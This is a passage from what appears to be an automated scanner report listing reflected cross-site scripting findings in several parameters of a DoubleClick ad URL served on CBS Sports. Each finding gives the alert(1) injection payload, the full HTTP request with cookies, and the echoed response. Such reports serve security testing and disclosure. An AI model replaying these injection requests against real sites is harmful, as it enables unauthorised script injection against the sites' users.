<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=b9bd0"-alert(1)-"79bd7310a71&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl
...[SNIP]...

3.65. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45e"-alert(1)-"e197175aae8 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.comce45e"-alert(1)-"e197175aae8&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.comce45e"-alert(1)-"e197175aae8&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");

...[SNIP]...

3.66. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 201c0"-alert(1)-"1c5f71daa33 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2201c0"-alert(1)-"1c5f71daa33&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:01:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2201c0"-alert(1)-"1c5f71daa33&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&
...[SNIP]...

3.67. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebfa2"-alert(1)-"617b1722fc6 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.comebfa2"-alert(1)-"617b1722fc6&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:09:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.comebfa2"-alert(1)-"617b1722fc6&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

3.68. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd5ca"-alert(1)-"c31bbc784d7 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuAcd5ca"-alert(1)-"c31bbc784d7&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:10:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuAcd5ca"-alert(1)-"c31bbc784d7&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.69. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 365f4"-alert(1)-"953eb1f2ac7 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=365f4"-alert(1)-"953eb1f2ac7&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:05:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
00/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=365f4"-alert(1)-"953eb1f2ac7&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50
...[SNIP]...

3.70. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb3bf"-alert(1)-"51781714db8 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100bb3bf"-alert(1)-"51781714db8&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:06:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
64997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100bb3bf"-alert(1)-"51781714db8&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/ht
...[SNIP]...

3.71. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257ed"-alert(1)-"07d6b0a1c33 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=257ed"-alert(1)-"07d6b0a1c33&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=257ed"-alert(1)-"07d6b0a1c33&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

3.72. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1502"-alert(1)-"5e7d2cb2fac was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001e1502"-alert(1)-"5e7d2cb2fac&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
94441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001e1502"-alert(1)-"5e7d2cb2fac&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.
...[SNIP]...

3.73. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e515"-alert(1)-"3d7d685553c was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2437e515"-alert(1)-"3d7d685553c&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:10:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2437e515"-alert(1)-"3d7d685553c&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

3.74. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5b4"-alert(1)-"68037134f06 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A2e5b4"-alert(1)-"68037134f06&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
